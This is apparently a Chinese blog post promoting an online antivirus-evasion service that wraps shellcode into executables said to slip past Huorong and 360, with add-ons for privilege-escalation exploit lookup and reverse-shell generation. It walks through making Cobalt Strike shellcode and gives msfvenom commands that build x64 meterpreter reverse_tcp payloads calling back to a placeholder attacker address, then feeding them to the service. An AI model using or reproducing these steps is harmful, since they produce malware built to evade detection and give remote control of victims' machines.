潮影在线免杀平台

陈晓
2022-08-15 / 0 评论 / 95 阅读 / 正在检测是否收录...

潮影在线免杀平台: http://bypass.tidesec.com

l6uhff9q.png

免杀专题文章及工具:https://github.com/TideSec/BypassAntiVirus

平台功能
目前平台主要实现了如下功能:shellcode免杀、windows提权辅助、杀软在线对比、常见提权命令、反弹shell命令。

shellcode免杀
shellocde免杀使用了多种shellcode加载方式,目前以Go语言实现为主,后期会加入Powershell、C、nim等语言,对shellcode的处理使用了随机变量、AES/RC4/多重Base64/Base85/异或算法、伪造签名、随机图标、免杀分离、条件触发等方式,在本地测试的时候效果还是不错的,但发现放到在线平台后,可能样本被上传的比较多,免杀效果就比较一般了。但目前来说过火绒和360卫士还是没有问题的。

使用也比较方便,只需要从Cobaltstrike或Msfvenom生成shellcode,填写到shellcode框内,调整一些参数,便可以在线生成免杀的可执行文件。

Cobaltstrike生成shellcode
在Cobaltstrike中Attacks-packages-Payload Generator。

然后选择好Listener之后,Output选C,下面选择x64,免杀效果更好。 查看生成的shellcode

把内容都整个复制到潮影在线免杀平台的输入框里就可以。之后提交,等待几秒钟就可以下载了。

Metasploit 生成shellcode
生成64位的payload c语言文件

msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=1.1.1.1 LPORT=3333

或者直接生成hex格式

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=1.1.1.1 LPORT=3333

上面生成的shellcode都可以直接复制到潮影在线免杀平台,系统会自动处理后生成免杀程序。

分别生成单exe和加载器 需要在cmd中运行 带上秘钥。

windows提权辅助
主要提供了Windows提权EXP在线搜索功能。

使用方式:运行cmd命令systeminfo获取信息,粘贴systeminfo信息或只粘贴补丁信息到编辑框内。

杀软在线对比
在windows系统cmd中执行tasklist,将进程信息输入即可。

Reverse Shell
可快速生成各种反弹shell,如ncat、socat、bash、C、perl、php、powershell、python、ruby、golang、telnet等多种语言和程序,并可自定义进行base64编码等。

没有一劳永逸的免杀,只有精益求精的绕过,后续平台也会继续更新完善,早日将更多语言、更多绕过姿势也都并入到平台中。

0

评论 (0)

取消
网站已运行 00000000

Powered by Typecho ※ Theme is RST网络


CDN Sponsor Server provider Google Analytics Google Analytics